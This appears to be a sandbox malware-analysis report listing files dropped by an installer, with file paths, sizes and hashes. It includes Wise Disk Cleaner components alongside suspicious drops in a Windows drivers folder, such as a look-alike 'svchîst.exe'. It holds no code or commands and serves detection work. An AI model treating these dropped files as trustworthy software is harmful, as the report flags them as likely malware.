c43f521781d59a150a124d6105d295dbfb5ac6dee0401b9c927eeda8ba0a8df21d1e69fdf8dc090314f3945b97dc72a9cd3ba9aed34bbb8f9ae96fdcb96ca784

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Romanian.ini

Filesize
73KB

MD5
e56f223aea3e1d394c31b93f17054cb7

SHA1
9fe9ca1dc70cd7e0b2264842139a364ac4a8e689

SHA256
865b6284291dba5b148d236f0ebfd3aebf0998dabfe36cc3a013658af1733dcc

SHA512
21050172c652bbcc93ab409d16aaef330a713d8dcf33b5f84ea323832b3489bddcb98ec552d00e48afd894e1f935a0fdc22749ee018f8d46d407559a0137eeed

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Russian.ini

Filesize
68KB

MD5
479bfcd4c6e0a91bce8eeb3d5282902a

SHA1
a73b34daca2a27e159a7f14148423bd0e8877287

SHA256
b326491b5a4245e9b3a436cfe1b023d88b35cdbbb50368bbac5f7d1f19560718

SHA512
8c799a763cae7bdd33ff8d9a3295b2b92f87413bdb46e590c02255aedbd32707faf5d5badfc884cddeeb8be4772c2f824d16af3996e5ecb0692a2399594121f0

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Serbian.ini

Filesize
58KB

MD5
d5de1a134aab351dcd5b8f22f32ec30a

SHA1
45404143905dcb284e99acd78285a3ba86a1c1a6

SHA256
2a2338c828fd426a6d50e4866ed1c59ccd292b877cf66374c57a8826b30c9aa1

SHA512
7727f4c9902daae600e48a950afd61ba2e26d8a943f20bbfc2ec7eaf01f1de2a8b9d04e4fd4ec9b38cf700c6df00d58c714f1208e60383755ad5220715912427

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovak.ini

Filesize
71KB

MD5
5108c5d28c126216a792f4a0900847fa

SHA1
9a8b3e565e37e1bf717d3e1c7ebca12e414328f5

SHA256
3860ad448ebd501be377fbd46c65cb4e7aecc809900d5f085ee5223931425695

SHA512
ce241b74f7903131fd0af070cc75a29d01e375e5d05636814fa123c1edfdb0304863f997fb3fcb3467bf87b770f8412acf67a29480b96877e8d4fd0888b39438

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovenian.ini

Filesize
56KB

MD5
204fe6fcde25232628a4d7b34e6b87fd

SHA1
613efc64843467bd90ec64949367f2139f4b581e

SHA256
4940b086c467d2ee6fd232f787bf03382c8328f2ce71c7ca747c02a7a368c1de

SHA512
88af2f2bff0fb8daa60c048cef6008bafdb636970b30da4765cf6ee2f62604e1581a3ce822555a14d018a7f10d0d2da2e072d58b12be4f27200dcdf20890b726

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Colombia).ini

Filesize
73KB

MD5
ae51cebbeb929ca8ef00abdee0554352

SHA1
e245b0ece229b9d1a2109fb48e1533f0f7dcc490

SHA256
9cb9b5580e4706168c02b07f3ef6656ebd2f6d9661cccd75b089a465d5ac0565

SHA512
c617871237592bfe3bcd1ac4e3b41ef4157b0b6cbcb636fe0d56f8ea59c198fc4551b6b86f1497778f3c4db06fb8e89169e5ac0e9662532d4c6f0f0b944a3ea1

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Spain).ini

Filesize
74KB

MD5
fef1352852ad6da36123893c3c183834

SHA1
5599ea541a373e9e63b692db17126eb42f1739bf

SHA256
d295342e3fff2bb44fe3010669400ddbc82e103f87beb5ead1c6b3cab3ade0b6

SHA512
7dda1508cd623dc753ef137ac58e759bab22f422f20d3802c49876bdd003015468ef5674c4186ae04fb745ae56d9ae21d57438baffad9597f0be53ee2e9f8d3a

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Swedish.ini

Filesize
55KB

MD5
8f053575db50cfaf4418fb2e5263b2ae

SHA1
cb95844f69291b2656726f156e51b8611a55d4fb

SHA256
98677a07f37daa333e507fc576aba8ebb4489a5822104f7c4bee53db2f8e4202

SHA512
e7e3fcddd6f1b21aa48901f0e8d9633705b69d8f34ce08c2e7fd81128c7dd811bf2755e4f517325a10480a427a7eebe19307deb96edff9ecc8077094ea740061

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Thai.ini

Filesize
54KB

MD5
85f062f1a900a1da8a32f46803cb62fb

SHA1
5baa775d7d287060937f8b86c69be1850a1f9ab4

SHA256
3e8e09cf740bef1dabdcb6a7c69185bf0fac3f13b727c2c1de79fbde7308470a

SHA512
7b40bff744244e48edafdb999aed616519b7665187a25d522c88532a0e5e8eacc9091fbb198c93fbe39a860e10c35ee39a689e8f31dab2cca578cf12057fef50

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Turkish.ini

Filesize
62KB

MD5
f34b68131e35f62513feb8278cca1ae1

SHA1
bd4ac075b01cd358431e2d9ad6fb2fe2de8b5aff

SHA256
49b0ecac0b88c345cd6b5f3f501f25e3720077faf6710c5f2b6fd984e4d4d7f9

SHA512
c6cdbeb4771f3cc2de6116c0fde80348d34ade78506d54c61eca596d3131bd809452155fc4868b18f15b3968ee0ae4f01e7cbefecafd58d499e263543bdc1dbf

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Ukrainian.ini

Filesize
54KB

MD5
a3384eb4a6122fb763038c26359acf05

SHA1
a0d587ccf4f19022e6e4b4df3106e87a1ded94c7

SHA256
3d20e0e5cfd6375253d4286ec5fd33fdf7aeb0d8bf26cb714d8b91e3b3c10868

SHA512
6b2d99fb897f6e7fa017b312127f29d37bfd046b343c1a6849a4e7cb408e9f7709d3b5d2000fab430f6189e70cd6afffef324b1187f8b25fe2e9ce3ca2b04a27

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Welsh.ini

Filesize
77KB

MD5
f1aa230d4e1dc0ad8ce48dbbf0f93353

SHA1
45c5ef63cf2110a2a11461185d30b9c5a081fc22

SHA256
265348499e6625affb99259e7d1770f0155a5e3b7bf62f4b61f3aa01832d8f9c

SHA512
263251223abca66cdeec425651c706d49e7bcc48769344104ef9cd5122ff9bdc125153b25207fc0af744b20d61086894cc8b10ee3defba9493e5da2709717202

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll

Filesize
164KB

MD5
b936056bd95fa2de3197f0267c07f529

SHA1
2cb2a37e5df9a9039995e0248058f0df361d7a90

SHA256
1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89

SHA512
156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll

Filesize
164KB

MD5
b936056bd95fa2de3197f0267c07f529

SHA1
2cb2a37e5df9a9039995e0248058f0df361d7a90

SHA256
1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89

SHA512
156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe

Filesize
7.9MB

MD5
e2921d7229412e500624c09645a5d222

SHA1
b1ce462f1a21b726f515150c5aede4b8c592c906

SHA256
ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c

SHA512
09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll

Filesize
889KB

MD5
dfa08af47fb6bbff6b92308bdce07fe8

SHA1
63078cb67be4bf2dda6cf0de7cfa204ba91441ca

SHA256
7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce

SHA512
07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967

Download Submit
C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll

Filesize
889KB

MD5
dfa08af47fb6bbff6b92308bdce07fe8

SHA1
63078cb67be4bf2dda6cf0de7cfa204ba91441ca

SHA256
7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce

SHA512
07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967

Download Submit
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

Filesize
36B

MD5
8708699d2c73bed30a0a08d80f96d6d7

SHA1
684cb9d317146553e8c5269c8afb1539565f4f78

SHA256
a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

SHA512
38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

Filesize
4.2MB

MD5
a22b08040d741fb41fc5812996ad3e8f

SHA1
cc684e1c8d24aabeb0eab2763655d3050389c953

SHA256
d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c

SHA512
a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

Filesize
4.2MB

MD5
a22b08040d741fb41fc5812996ad3e8f

SHA1
cc684e1c8d24aabeb0eab2763655d3050389c953

SHA256
d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c

SHA512
a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe

Filesize
523KB

MD5
e6495a498dfa91672a383cb9459c9c5e

SHA1
d1d44a9ec6df8fc42008c13bcf18ca5f790a371e

SHA256
ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778

SHA512
7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe

Filesize
523KB

MD5
e6495a498dfa91672a383cb9459c9c5e

SHA1
d1d44a9ec6df8fc42008c13bcf18ca5f790a371e

SHA256
ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778

SHA512
7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp

Filesize
1.2MB

MD5
2542d7026b9bbf47242cc3bae8e889e7

SHA1
4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d

SHA256
71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf

SHA512
be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp

Filesize
1.2MB

MD5
2542d7026b9bbf47242cc3bae8e889e7

SHA1
4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d

SHA256
71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf

SHA512
be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb

Download Submit
C:\Windows\SysWOW64\drivers\install.exe

Filesize
207KB

MD5
1cd9ee0406b9a04672fdd385ca7631ce

SHA1
5b3b49cd7906676ad46a7b7d192967df6c9ea505

SHA256
2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8

SHA512
367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

Download Submit
C:\Windows\SysWOW64\drivers\install.exe

Filesize
207KB

MD5
1cd9ee0406b9a04672fdd385ca7631ce

SHA1
5b3b49cd7906676ad46a7b7d192967df6c9ea505

SHA256
2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8

SHA512
367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

Download Submit
C:\Windows\SysWOW64\drivers\libeay32.dll

Filesize
1.3MB

MD5
4cb2e1b9294ddae1bf7dcaaf42b365d1

SHA1
a225f53a8403d9b73d77bcbb075194520cce5a14

SHA256
a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884

SHA512
46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

Download Submit
C:\Windows\SysWOW64\drivers\libeay32.dll

Filesize
1.3MB

MD5
4cb2e1b9294ddae1bf7dcaaf42b365d1

SHA1
a225f53a8403d9b73d77bcbb075194520cce5a14

SHA256
a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884

SHA512
46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

Download Submit
C:\Windows\SysWOW64\drivers\libeay32.dll

Filesize
1.3MB

MD5
4cb2e1b9294ddae1bf7dcaaf42b365d1

SHA1
a225f53a8403d9b73d77bcbb075194520cce5a14

SHA256
a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884

SHA512
46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

Download Submit
C:\Windows\SysWOW64\drivers\ssleay32.dll

Filesize
337KB

MD5
5c268ca919854fc22d85f916d102ee7f

SHA1
0957cf86e0334673eb45945985b5c033b412be0e

SHA256
1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56

SHA512
76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

Download Submit
C:\Windows\SysWOW64\drivers\ssleay32.dll

Filesize
337KB

MD5
5c268ca919854fc22d85f916d102ee7f

SHA1
0957cf86e0334673eb45945985b5c033b412be0e

SHA256
1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56

SHA512
76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

Download Submit
C:\Windows\SysWOW64\drivers\ssleay32.dll

Filesize
337KB

MD5
5c268ca919854fc22d85f916d102ee7f

SHA1
0957cf86e0334673eb45945985b5c033b412be0e

SHA256
1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56

SHA512
76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

Download Submit
C:\Windows\SysWOW64\drivers\svchîst.exe

Filesize
11.1MB

MD5
a6fcc7dd9a6e029c921555b1de6fd586

SHA1
a889c079a86d600896e14973ba5775b6b1f6ac60

SHA256
4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe

SHA512
6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

Download Submit
C:\Windows\SysWOW64\drivers\svchîst.exe

Filesize
11.1MB

MD5
a6fcc7dd9a6e029c921555b1de6fd586

SHA1
a889c079a86d600896e14973ba5775b6b1f6ac60

SHA256
4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe

SHA512
6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

Download Submit
C:\Windows\SysWOW64\drivers\svchîst.exe

Filesize
11.1MB

MD5
a6fcc7dd9a6e029c921555b1de6fd586

SHA1
a889c079a86d600896e14973ba5775b6b1f6ac60

SHA256
4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe

SHA512
6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

Download Submit
memory/876-139-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/876-145-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download